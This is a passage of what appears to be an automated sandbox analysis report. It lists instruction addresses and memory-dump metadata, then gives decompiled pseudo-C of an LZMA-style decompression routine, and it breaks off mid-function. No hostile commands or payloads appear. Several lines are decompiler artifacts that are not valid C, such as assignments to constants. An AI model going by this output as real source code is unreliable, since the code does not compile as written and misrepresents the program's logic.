                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x00406803
                                            0x00406a38
                                            0x00406a5a
                                            0x00406a60
                                            0x00406a62
                                            0x00406a69
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                            • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                            • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                            • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E00406473() {
                                            				signed int _t539;
                                            				unsigned short _t540;
                                            				signed int _t541;
                                            				void _t542;
                                            				signed int _t543;
                                            				signed int _t544;
                                            				signed int _t573;
                                            				signed int _t576;
                                            				signed int _t597;
                                            				signed int* _t614;
                                            				void* _t621;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t621 - 0x40) != 1) {
                                            						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                            						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                            						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                            						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                            						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                            						_t539 =  *(_t621 - 4) + 0x664;
                                            						 *(_t621 - 0x58) = _t539;
                                            						goto L68;
                                            					} else {
                                            						 *(__ebp - 0x84) = 8;
                                            						while(1) {
                                            							L132:
                                            							 *(_t621 - 0x54) = _t614;
                                            							while(1) {
                                            								L133:
                                            								_t540 =  *_t614;
                                            								_t597 = _t540 & 0x0000ffff;
                                            								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                            								if( *(_t621 - 0xc) >= _t573) {
                                            									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                            									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                            									 *(_t621 - 0x40) = 1;
                                            									_t541 = _t540 - (_t540 >> 5);
                                            									 *_t614 = _t541;
                                            								} else {
                                            									 *(_t621 - 0x10) = _t573;
                                            									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                            									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                            								}
                                            								if( *(_t621 - 0x10) >= 0x1000000) {
                                            									goto L139;
                                            								}
                                            								L137:
                                            								if( *(_t621 - 0x6c) == 0) {
                                            									 *(_t621 - 0x88) = 5;
                                            									L170:
                                            									_t576 = 0x22;
                                            									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                            									_t544 = 0;
                                            									L172:
                                            									return _t544;
                                            								}
                                            								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                            								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                            								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                            								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                            								L139:
                                            								_t542 =  *(_t621 - 0x84);
                                            								while(1) {
                                            									 *(_t621 - 0x88) = _t542;
                                            									while(1) {
                                            										L1:
                                            										_t543 =  *(_t621 - 0x88);
                                            										if(_t543 > 0x1c) {
                                            											break;
                                            										}
                                            										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
                                            											case 0:
                                            												if( *(_t621 - 0x6c) == 0) {
                                            													goto L170;
                                            												}
                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                            												_t543 =  *( *(_t621 - 0x70));
                                            												if(_t543 > 0xe1) {
                                            													goto L171;
                                            												}
                                            												_t547 = _t543 & 0x000000ff;
                                            												_push(0x2d);
                                            												asm("cdq");
                                            												_pop(_t578);
                                            												_push(9);
                                            												_pop(_t579);
                                            												_t617 = _t547 / _t578;
                                            												_t549 = _t547 % _t578 & 0x000000ff;
                                            												asm("cdq");
                                            												_t612 = _t549 % _t579 & 0x000000ff;
                                            												 *(_t621 - 0x3c) = _t612;
                                            												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                            												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                            												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                            												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                            													L10:
                                            													if(_t620 == 0) {
                                            														L12:
                                            														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                            														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                            														goto L15;
                                            													} else {
                                            														goto L11;
                                            													}
                                            													do {
                                            														L11:
                                            														_t620 = _t620 - 1;
                                            														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                            													} while (_t620 != 0);
                                            													goto L12;
                                            												}
                                            												if( *(_t621 - 4) != 0) {
                                            													GlobalFree( *(_t621 - 4));
                                            												}
                                            												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                            												 *(_t621 - 4) = _t543;
                                            												if(_t543 == 0) {
                                            													goto L171;
                                            												} else {
                                            													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                            													goto L10;
                                            												}
                                            											case 1:
                                            												L13:
                                            												__eflags =  *(_t621 - 0x6c);
                                            												if( *(_t621 - 0x6c) == 0) {
                                            													 *(_t621 - 0x88) = 1;
                                            													goto L170;
                                            												}
                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                            												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                            												_t45 = _t621 - 0x48;
                                            												 *_t45 =  *(_t621 - 0x48) + 1;
                                            												__eflags =  *_t45;
                                            												L15:
                                            												if( *(_t621 - 0x48) < 4) {
                                            													goto L13;
                                            												}
                                            												_t555 =  *(_t621 - 0x40);
                                            												if(_t555 ==  *(_t621 - 0x74)) {
                                            													L20:
                                            													 *(_t621 - 0x48) = 5;
                                            													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                            													goto L23;
                                            												}
                                            												 *(_t621 - 0x74) = _t555;
                                            												if( *(_t621 - 8) != 0) {
                                            													GlobalFree( *(_t621 - 8)); // executed
                                            												}
                                            												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                            												 *(_t621 - 8) = _t543;
                                            												if(_t543 == 0) {
                                            													goto L171;
                                            												} else {
                                            													goto L20;
                                            												}
                                            											case 2:
                                            												L24:
                                            												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                            												 *(_t621 - 0x84) = 6;
                                            												 *(_t621 - 0x4c) = _t562;
                                            												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                            												goto L132;
                                            											case 3:
                                            												L21:
                                            												__eflags =  *(_t621 - 0x6c);
                                            												if( *(_t621 - 0x6c) == 0) {
                                            													 *(_t621 - 0x88) = 3;
                                            													goto L170;
                                            												}
                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                            												_t67 = _t621 - 0x70;
                                            												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                            												__eflags =  *_t67;
                                            												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                            												L23:
                                            												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                            												if( *(_t621 - 0x48) != 0) {
                                            													goto L21;
                                            												}
                                            												goto L24;
                                            											case 4:
                                            												L133:
                                            												_t540 =  *_t614;
                                            												_t597 = _t540 & 0x0000ffff;
                                            												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                            												if( *(_t621 - 0xc) >= _t573) {
                                            													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                            													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                            													 *(_t621 - 0x40) = 1;
                                            													_t541 = _t540 - (_t540 >> 5);
                                            													 *_t614 = _t541;
                                            												} else {
                                            													 *(_t621 - 0x10) = _t573;
                                            													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                            													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                            												}
                                            												if( *(_t621 - 0x10) >= 0x1000000) {
                                            													goto L139;
                                            												}
                                            											case 5:
                                            												goto L137;
                                            											case 6:
                                            												__edx = 0;
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x34) = 1;
                                            													 *(__ebp - 0x84) = 7;
                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            													L132:
                                            													 *(_t621 - 0x54) = _t614;
                                            													goto L133;
                                            												}
                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            												__esi =  *(__ebp - 0x60);
                                            												__cl = 8;
                                            												__cl = 8 -  *(__ebp - 0x3c);
                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            												__ecx =  *(__ebp - 0x3c);
                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            												__ecx =  *(__ebp - 4);
                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            												__eflags =  *(__ebp - 0x38) - 4;
                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            												if( *(__ebp - 0x38) >= 4) {
                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                            													if( *(__ebp - 0x38) >= 0xa) {
                                            														_t98 = __ebp - 0x38;
                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                            														__eflags =  *_t98;
                                            													} else {
                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            													}
                                            												} else {
                                            													 *(__ebp - 0x38) = 0;
                                            												}
                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                            												if( *(__ebp - 0x34) == __edx) {
                                            													__ebx = 0;
                                            													__ebx = 1;
                                            													goto L61;
                                            												} else {
                                            													__eax =  *(__ebp - 0x14);
                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            													__eflags = __eax -  *(__ebp - 0x74);
                                            													if(__eax >=  *(__ebp - 0x74)) {
                                            														__eax = __eax +  *(__ebp - 0x74);
                                            														__eflags = __eax;
                                            													}
                                            													__ecx =  *(__ebp - 8);
                                            													__ebx = 0;
                                            													__ebx = 1;
                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            													goto L41;
                                            												}
                                            											case 7:
                                            												goto L0;
                                            											case 8:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x84) = 0xa;
                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            												} else {
                                            													__eax =  *(__ebp - 0x38);
                                            													__ecx =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                            													 *(__ebp - 0x84) = 9;
                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            												}
                                            												while(1) {
                                            													L132:
                                            													 *(_t621 - 0x54) = _t614;
                                            													goto L133;
                                            												}
                                            											case 9:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													goto L89;
                                            												}
                                            												__eflags =  *(__ebp - 0x60);
                                            												if( *(__ebp - 0x60) == 0) {
                                            													goto L171;
                                            												}
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                            												__eflags = _t258;
                                            												0 | _t258 = _t258 + _t258 + 9;
                                            												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                            												goto L75;
                                            											case 0xa:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x84) = 0xb;
                                            													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            													while(1) {
                                            														L132:
                                            														 *(_t621 - 0x54) = _t614;
                                            														goto L133;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x28);
                                            												goto L88;
                                            											case 0xb:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__ecx =  *(__ebp - 0x24);
                                            													__eax =  *(__ebp - 0x20);
                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												} else {
                                            													__eax =  *(__ebp - 0x24);
                                            												}
                                            												__ecx =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												L88:
                                            												__ecx =  *(__ebp - 0x2c);
                                            												 *(__ebp - 0x2c) = __eax;
                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            												L89:
                                            												__eax =  *(__ebp - 4);
                                            												 *(__ebp - 0x80) = 0x15;
                                            												__eax =  *(__ebp - 4) + 0xa68;
                                            												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            												goto L68;
                                            											case 0xc:
                                            												L99:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xc;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t334 = __ebp - 0x70;
                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t334;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												__eax =  *(__ebp - 0x2c);
                                            												goto L101;
                                            											case 0xd:
                                            												L37:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xd;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t122 = __ebp - 0x70;
                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t122;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L39:
                                            												__eax =  *(__ebp - 0x40);
                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            													goto L48;
                                            												}
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													goto L54;
                                            												}
                                            												L41:
                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            												 *(__ebp - 0x48) = __eax;
                                            												__eax = __eax + 1;
                                            												__eax = __eax << 8;
                                            												__eax = __eax + __ebx;
                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edx = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													 *(__ebp - 0x40) = 1;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													__ebx = __ebx + __ebx + 1;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edx;
                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L39;
                                            												} else {
                                            													goto L37;
                                            												}
                                            											case 0xe:
                                            												L46:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xe;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t156 = __ebp - 0x70;
                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t156;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												while(1) {
                                            													L48:
                                            													__eflags = __ebx - 0x100;
                                            													if(__ebx >= 0x100) {
                                            														break;
                                            													}
                                            													__eax =  *(__ebp - 0x58);
                                            													__edx = __ebx + __ebx;
                                            													__ecx =  *(__ebp - 0x10);
                                            													__esi = __edx + __eax;
                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                            													__ax =  *__esi;
                                            													 *(__ebp - 0x54) = __esi;
                                            													__edi = __ax & 0x0000ffff;
                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                            													if( *(__ebp - 0xc) >= __ecx) {
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            														__cx = __ax;
                                            														_t170 = __edx + 1; // 0x1
                                            														__ebx = _t170;
                                            														__cx = __ax >> 5;
                                            														__eflags = __eax;
                                            														 *__esi = __ax;
                                            													} else {
                                            														 *(__ebp - 0x10) = __ecx;
                                            														0x800 = 0x800 - __edi;
                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            														__ebx = __ebx + __ebx;
                                            														 *__esi = __cx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													 *(__ebp - 0x44) = __ebx;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														continue;
                                            													} else {
                                            														goto L46;
                                            													}
                                            												}
                                            												L54:
                                            												_t173 = __ebp - 0x34;
                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            												__eflags =  *_t173;
                                            												goto L55;
                                            											case 0xf:
                                            												L58:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xf;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t203 = __ebp - 0x70;
                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t203;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L60:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													L55:
                                            													__al =  *(__ebp - 0x44);
                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            													goto L56;
                                            												}
                                            												L61:
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t217 = __edx + 1; // 0x1
                                            													__ebx = _t217;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L60;
                                            												} else {
                                            													goto L58;
                                            												}
                                            											case 0x10:
                                            												L109:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0x10;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t365 = __ebp - 0x70;
                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t365;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												goto L111;
                                            											case 0x11:
                                            												L68:
                                            												_t614 =  *(_t621 - 0x58);
                                            												 *(_t621 - 0x84) = 0x12;
                                            												while(1) {
                                            													L132:
                                            													 *(_t621 - 0x54) = _t614;
                                            													goto L133;
                                            												}
                                            											case 0x12:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 0x58);
                                            													 *(__ebp - 0x84) = 0x13;
                                            													__esi =  *(__ebp - 0x58) + 2;
                                            													while(1) {
                                            														L132:
                                            														 *(_t621 - 0x54) = _t614;
                                            														goto L133;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x4c);
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax =  *(__ebp - 0x4c) << 4;
                                            												__eflags = __eax;
                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                            												goto L130;
                                            											case 0x13:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													_t469 = __ebp - 0x58;
                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            													__eflags =  *_t469;
                                            													 *(__ebp - 0x30) = 0x10;
                                            													 *(__ebp - 0x40) = 8;
                                            													L144:
                                            													 *(__ebp - 0x7c) = 0x14;
                                            													goto L145;
                                            												}
                                            												__eax =  *(__ebp - 0x4c);
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax =  *(__ebp - 0x4c) << 4;
                                            												 *(__ebp - 0x30) = 8;
                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            												L130:
                                            												 *(__ebp - 0x58) = __eax;
                                            												 *(__ebp - 0x40) = 3;
                                            												goto L144;
                                            											case 0x14:
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            												__eax =  *(__ebp - 0x80);
                                            												 *(_t621 - 0x88) = _t542;
                                            												goto L1;
                                            											case 0x15:
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
